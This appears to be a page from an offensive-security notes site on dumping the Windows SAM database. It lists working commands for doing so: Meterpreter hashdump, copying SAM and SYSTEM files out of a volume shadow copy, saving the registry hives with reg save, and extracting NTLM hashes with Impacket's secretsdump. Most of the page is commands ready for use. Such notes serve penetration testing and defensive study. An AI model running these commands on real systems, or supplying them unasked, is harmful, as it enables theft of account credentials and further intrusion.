Security Account Manager (SAM)

SAM Database (Security Account Manager)

The SAM database stores local account information, including credentials. Access to the SAM file is restricted as it is constantly in use, and attempting to directly access it with the following command will not work:

type c:\Windows\System32\config\sam

Dumping SAM Database

Using Meterpreter

Administrator privileges are required to dump the SAM database with Meterpreter.

meterpreter > getuid  
meterpreter > hashdump

Using Volume Shadow Copy Service (VSS)

VSS can create backups of files while the system is in use.

  1. Create a shadow copy:

    wmic shadowcopy call create Volume='C:\'

  2. Verify the shadow copy creation:

    vssadmin list shadows

  3. Copy the SAM and SYSTEM files from the shadow copy:

    copy \\?\<Volume Shadow LOCATION>\windows\system32\config\sam  
copy \\?\<Volume Shadow LOCATION>\windows\system32\config\system

Using Registry Hives

The SAM database can also be accessed through the Windows registry. Save the SAM and SYSTEM hives:

reg save HKLM\sam C:\users\Administrator\Desktop\sam-reg  
reg save HKLM\system C:\users\Administrator\Desktop\system-reg

Extracting NTLM Hashes

The SAM database can be used to extract NTLM hashes with tools like Impacket.

python3 /opt/impacket/examples/secretsdump.py -sam /tmp/sam-reg -system /tmp/system-reg LOCAL
PreviousClear-text filesNextLocal Security Authority Subsystem Service (LSASS)

Last updated